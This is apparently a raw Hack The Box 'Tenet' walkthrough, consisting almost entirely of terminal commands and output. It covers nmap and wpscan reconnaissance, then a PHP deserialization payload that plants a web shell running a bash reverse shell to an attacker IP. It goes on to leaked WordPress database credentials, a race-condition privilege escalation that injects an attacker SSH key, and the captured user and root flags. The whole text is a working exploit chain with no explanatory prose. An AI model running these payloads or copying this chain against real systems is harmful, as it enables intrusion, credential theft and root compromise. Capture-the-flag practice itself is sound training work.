$ sudo nmap -p- -T4 -A 10.10.10.223
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 cc:ca:43:d4:4c:e7:4e:bf:26:f4:27:ea:b8:75:a8:f8 (RSA)
| 256 85:f3:ac:ba:1a:6a:03:59:e2:7e:86:47:e7:3e:3c:00 (ECDSA)
|_ 256 e7:e9:9a:dd:c3:4a:2f:7a:e1:e0:5d:a2:b0:ca:44:a8 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
$ dirb http://10.10.10.223
---- Scanning URL: http://10.10.10.223/ ----
+ http://10.10.10.223/index.html (CODE:200|SIZE:10918)
+ http://10.10.10.223/server-status (CODE:403|SIZE:277)
==> DIRECTORY: http://10.10.10.223/wordpress/
---- Entering directory: http://10.10.10.223/wordpress/ ----
+ http://10.10.10.223/wordpress/index.php (CODE:301|SIZE:0)
==> DIRECTORY: http://10.10.10.223/wordpress/wp-admin/
==> DIRECTORY: http://10.10.10.223/wordpress/wp-content/
==> DIRECTORY: http://10.10.10.223/wordpress/wp-includes/
+ http://10.10.10.223/wordpress/xmlrpc.php (CODE:405|SIZE:42)
---- Entering directory: http://10.10.10.223/wordpress/wp-admin/ ----
+ http://10.10.10.223/wordpress/wp-admin/admin.php (CODE:302|SIZE:0)
==> DIRECTORY: http://10.10.10.223/wordpress/wp-admin/css/
==> DIRECTORY: http://10.10.10.223/wordpress/wp-admin/images/
==> DIRECTORY: http://10.10.10.223/wordpress/wp-admin/includes/
+ http://10.10.10.223/wordpress/wp-admin/index.php (CODE:302|SIZE:0)
==> DIRECTORY: http://10.10.10.223/wordpress/wp-admin/js/
==> DIRECTORY: http://10.10.10.223/wordpress/wp-admin/maint/
==> DIRECTORY: http://10.10.10.223/wordpress/wp-admin/network/
==> DIRECTORY: http://10.10.10.223/wordpress/wp-admin/user/
---- Entering directory: http://10.10.10.223/wordpress/wp-content/ ----
+ http://10.10.10.223/wordpress/wp-content/index.php (CODE:200|SIZE:0)
==> DIRECTORY: http://10.10.10.223/wordpress/wp-content/plugins/
==> DIRECTORY: http://10.10.10.223/wordpress/wp-content/themes/
==> DIRECTORY: http://10.10.10.223/wordpress/wp-content/uploads/
---- Entering directory: http://10.10.10.223/wordpress/wp-includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.10.223/wordpress/wp-admin/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.10.223/wordpress/wp-admin/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.10.223/wordpress/wp-admin/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.10.223/wordpress/wp-admin/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.10.223/wordpress/wp-admin/maint/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.10.223/wordpress/wp-admin/network/ ----
+ http://10.10.10.223/wordpress/wp-admin/network/admin.php (CODE:302|SIZE:0)
+ http://10.10.10.223/wordpress/wp-admin/network/index.php (CODE:302|SIZE:0)
---- Entering directory: http://10.10.10.223/wordpress/wp-admin/user/ ----
+ http://10.10.10.223/wordpress/wp-admin/user/admin.php (CODE:302|SIZE:0)
+ http://10.10.10.223/wordpress/wp-admin/user/index.php (CODE:302|SIZE:0)
---- Entering directory: http://10.10.10.223/wordpress/wp-content/plugins/ ----
+ http://10.10.10.223/wordpress/wp-content/plugins/index.php (CODE:200|SIZE:0)
---- Entering directory: http://10.10.10.223/wordpress/wp-content/themes/ ----
+ http://10.10.10.223/wordpress/wp-content/themes/index.php (CODE:200|SIZE:0)
---- Entering directory: http://10.10.10.223/wordpress/wp-content/uploads/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
$ echo 10.10.10.223 tenet.htb | sudo tee -a /etc/hosts
Key words on http://tenet.htb:
neil sator protagonist Rotas
$ wpscan --url tenet.htb
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.29 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://tenet.htb/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://tenet.htb/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://tenet.htb/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://tenet.htb/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.6 identified (Outdated, released on 2020-12-08).
| Found By: Rss Generator (Passive Detection)
| - http://tenet.htb/index.php/feed/, <generator>https://wordpress.org/?v=5.6</generator>
| - http://tenet.htb/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.6</generator>
[+] WordPress theme in use: twentytwentyone
| Location: http://tenet.htb/wp-content/themes/twentytwentyone/
| Last Updated: 2021-03-09T00:00:00.000Z
| Readme: http://tenet.htb/wp-content/themes/twentytwentyone/readme.txt
| [!] The version is out of date, the latest version is 1.2
| Style URL: http://tenet.htb/wp-content/themes/twentytwentyone/style.css?ver=1.0
| Style Name: Twenty Twenty-One
| Style URI: https://wordpress.org/themes/twentytwentyone/
| Description: Twenty Twenty-One is a blank canvas for your ideas and it makes the block editor your best brush. Wi...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.0 (80% confidence)
| Found By: Style (Passive Detection)
| - http://tenet.htb/wp-content/themes/twentytwentyone/style.css?ver=1.0, Match: 'Version: 1.0'
[+] Enumerating All Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:00 <======================================================================================================> (22 / 22) 100.00% Time: 00:00:00
[i] No Config Backups Found.
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
https://medium.com/swlh/exploiting-php-deserialization-56d71f03282a
nc -lnvp 5555
kali@kali:~/0.htb/machines/Tenet223$ php -a
Interactive mode enabled
php > class DatabaseExport {
php { public $user_file = 'rce.php';
php { public $data = '<?php exec("/bin/bash -c \'bash -i > /dev/tcp/10.10.14.134/4444 0>&1\'"); ?>';
php { }
php > print urlencode(serialize(new DatabaseExport));
O%3A14%3A%22DatabaseExport%22%3A2%3A%7Bs%3A9%3A%22user_file%22%3Bs%3A7%3A%22rce.php%22%3Bs%3A4%3A%22data%22%3Bs%3A74%3A%22%3C%3Fphp+exec%28%22%2Fbin%2Fbash+-c+%27bash+-i+%3E+%2Fdev%2Ftcp%2F10.10.14.134%2F4444+0%3E%261%27%22%29%3B+%3F%3E%22%3B%7D
php >
ali@kali:~/0.htb/machines/Tenet223$ curl -i http://sator.tenet.htb/sator.php?arepo=O%3A14%3A%22DatabaseExport%22%3A2%3A%7Bs%3A9%3A%22user_file%22%3Bs%3A7%3A%22rce.php%22%3Bs%3A4%3A%22data%22%3Bs%3A74%3A%22%3C%3Fphp+exec%28%22%2Fbin%2Fbash+-c+%27bash+-i+%3E+%2Fdev%2Ftcp%2F10.10.14.134%2F4444+0%3E%261%27%22%29%3B+%3F%3E%22%3B%7D
neil@tenet:/var/www/html/wordpress$ ll
wp-config.php
neil: Opera2112
kali@kali:~/0.htb/machines/Tenet223$ ssh neil@10.10.10.223
neil@tenet:~$ cat user.txt
9211f1ad8c04d5fd713685074e3d9b36
neil@tenet:~$ sudo -l
Matching Defaults entries for neil on tenet:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:
User neil may run the following commands on tenet:
(ALL : ALL) NOPASSWD: /usr/local/bin/enableSSH.sh
while true; do echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDeYZ9sJVrH4IfMx50cZSfpnsdi98SgU4WtQHUjXcyHsx9jD5RJaviSdt3JijTSP4+ctXbMoZWqv/dDFKSN3N2aG8U2gjhaabAzQU8ICo4Ow/qZNlyNLW4mD7SJK44rmga6c03PsygOH+E0UQpW/cOgUym7Oaj0qYL5caN0q/0b5lJqTsMpxOmUz6+TXFiVH+PjaLb5RJo8YRbGZN51cY9/hFmuXuNuXfGRPNS7VAaun9Cu+tLqgx334GvqriUdU6HxT5N/wkTy4wum/Oi94/o4rzbLTZYhCpQMtm1k1CVht9YO6RpjioB3hUTKR7UKtgBoo6d0fNVZld0kRP8jf9l995/6QOfUGbCK2eHAxKdBqFqa5cdRMezFE1DrVDrNX1dbYHJOs8QFJMp042Q+ecoORleFfhVA5ZtcGTsXkA9peXC9SAkec3PtuUEULXS5ait6hEqQk7Tzps4j8LG+vtL3TTWZDLN/4MVLudWZi8Y4or7yrCTwh7HKFfiWR2NG//E= kali@kali" | tee /tmp/ssh* > /dev/null; done
neil@tenet:~$ while true; do echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDeYZ9sJVrH4IfMx50cZSfpnsdi98SgU4WtQHUjXcyHsx9jD5RJaviSdt3JijTSP4+ctXbMoZWqv/dDFKSN3N2aG8U2gjhaabAzQU8ICo4Ow/qZNlyNLW4mD7SJK44rmga6c03PsygOH+E0UQpW/cOgUym7Oaj0qYL5caN0q/0b5lJqTsMpxOmUz6+TXFiVH+PjaLb5RJo8YRbGZN51cY9/hFmuXuNuXfGRPNS7VAaun9Cu+tLqgx334GvqriUdU6HxT5N/wkTy4wum/Oi94/o4rzbLTZYhCpQMtm1k1CVht9YO6RpjioB3hUTKR7UKtgBoo6d0fNVZld0kRP8jf9l995/6QOfUGbCK2eHAxKdBqFqa5cdRMezFE1DrVDrNX1dbYHJOs8QFJMp042Q+ecoORleFfhVA5ZtcGTsXkA9peXC9SAkec3PtuUEULXS5ait6hEqQk7Tzps4j8LG+vtL3TTWZDLN/4MVLudWZi8Y4or7yrCTwh7HKFfiWR2NG//E= kali@kali" | tee /tmp/ssh* > /dev/null; done
sudo /usr/local/bin/enableSSH.sh
neil@tenet:/var/www/html/wordpress$ cd /usr/local/bin/
neil@tenet:/usr/local/bin$ ll
total 12
drwxr-xr-x 2 root root 4096 Dec 8 13:46 ./
drwxr-xr-x 10 root root 4096 Jul 25 2018 ../
-rwxr-xr-x 1 root root 1080 Dec 8 13:46 enableSSH.sh*
neil@tenet:/usr/local/bin$ sudo /usr/local/bin/enableSSH.sh
Error in adding root@ubuntu to authorized_keys file!
neil@tenet:/usr/local/bin$ sudo /usr/local/bin/enableSSH.sh
Error in adding root@ubuntu to authorized_keys file!
neil@tenet:/usr/local/bin$ sudo /usr/local/bin/enableSSH.sh
Successfully added root@ubuntu to authorized_keys file!
neil@tenet:/usr/local/bin$
$ ssh root@10.10.10.223
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-129-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Fri Apr 23 20:13:27 UTC 2021
System load: 1.35 Processes: 181
Usage of /: 15.2% of 22.51GB Users logged in: 1
Memory usage: 11% IP address for ens160: 10.10.10.223
Swap usage: 0%
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
53 packages can be updated.
31 of these updates are security updates.
To see these additional updates run: apt list --upgradable
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Thu Feb 11 14:37:46 2021
root@tenet:~# ls
root.txt
root@tenet:~# cat root.txt
395bf519952f301869a9f1bf60f3a8bd
root@tenet:~#